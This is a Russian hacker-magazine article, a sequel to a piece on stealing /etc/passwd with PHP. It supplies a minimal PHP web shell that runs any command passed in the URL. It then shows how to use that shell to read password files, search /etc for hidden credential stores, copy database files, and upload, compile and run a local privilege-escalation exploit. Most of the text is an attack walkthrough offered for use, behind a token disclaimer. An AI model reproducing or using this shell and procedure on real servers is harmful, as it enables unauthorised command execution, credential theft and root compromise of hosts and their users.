Внимание: Статья дана в ознакомительных целях, автор не несет ответственности за изложенное ниже.
—-
Хай, BRAT! ;-))

Если ты не читал мою предыдущую статью «Берем /etc/passwd с помощью PHP»
тогда даже и не думай читать эту.=)) Ты просто не поймешь смысла =)

Так вот, после публикации той статьи я получил много сообщений на мою бедную(теперь уже) асю.
У некоторых был файл passwd, но он был в тени, а у некоторых не было passwd, но было что-то другое,
короче были траблы(админы выкручиваются как могут).

В той статье мы использовали функцию =exec=, но с ней много головной боли, т.к. надо постоянно проверять почту.
Здесь мы используем тоже, супер-функцию : =PassThru= — выполняет любую Юникс-команду, и выводит резулт =))

В ЭТОЙ статье ты найдешь: Как найти файл passwd, и как скомпилить эксплоит и запустить. 😉

=====
Для начала создай файл test.php — в нем мы будем экспериментировать.

<?
PassThru($command,$result);
print($result);
?>

Вот и создан костяк.Теперь чтобы выполнить любую команду заходи броузером:
http://youserver.com/test.php?command=тут команда Unix
Если наберешь cat /etc/passwd, то в окне твоего броузера появиться файл passwd =)

А если он в тени,а shadow нет? спросишь ты..
Я отвечу: «Значит админ схитрил, и держит его в другом файле»…
Обычно это там же, в директории /etc/.
Поэтому делай следующее:
http://youserver.com/test.php?command=find /etc
и нажимай Enter. Сейчас перед тобой содержимое дир. /etc
Если увидел что-то подозрительное, мы ведь ищем пароли,
то делай следующее:
http://youserver.com/test.php?command=cat /etc/подозрительный файл
нажимай Enter и перед тобой содержимое «подозрительного файла»…

Возможно, что ты увидишь файлы баз данных, архивированные файлы,
тогда cat тебе не поможет пиши так:
http://youserver.com/test.php?command=cp /etc/file.db 1.db
И опять Enter. Теперь файл file.db будет лежать в твоей директории(там где и test.php), и называться 1.db.

Всё,с поиском файла закончили =)
=====
Переходим к второй части: записывание, компилирование и запуск эксплоита…
Потребуется опять же наш родной файл test.php =))

В броузере пиши:
http://youserver.com/test.php?command=uname -a
Enter. Перед тобой версия ОСьки на которой стоит сервер…
Допустим FreeBsd…

Идешь, и начинаешь искать ЛОКАЛЬНЫЙ, именно локальный эксплоит, а не рэмоутный..
Допустим нашел… Допустим он на C.
Закидываешь его в свою директорию, там где test.php и остальные файлы.
В броузере пишешь:
http://youserver.com/test.php?command=ls
Если среди тех файлов, которые там появились есть твой эксплоит, то пол-дела сделано =)
Теперь его надо скомпилить, пиши
http://youserver.com/test.php?command=gcc exploit.c
Всё, скомпилили…
Теперь запускаем:
http://youserver.com/test.php?command=./exploit тут могут быть параметры
Запустили =))))

Вроде всё что хотел рассказал =))
Всё, пока !!!

P.S.Я составляю Faq по php, если хочешь чтобы твой вопрос попал в этот фак
шли его на асю 75142289 (только не надо меня добавлять к себе в контакт-лист), и получишь на него ответ, который ты найдешь в статье ][.

Оставить мнение

Check Also

Windows 10 против шифровальщиков. Как устроена защита в обновленной Windows 10

Этой осенью Windows 10 обновилась до версии 1709 с кодовым названием Fall Creators Update …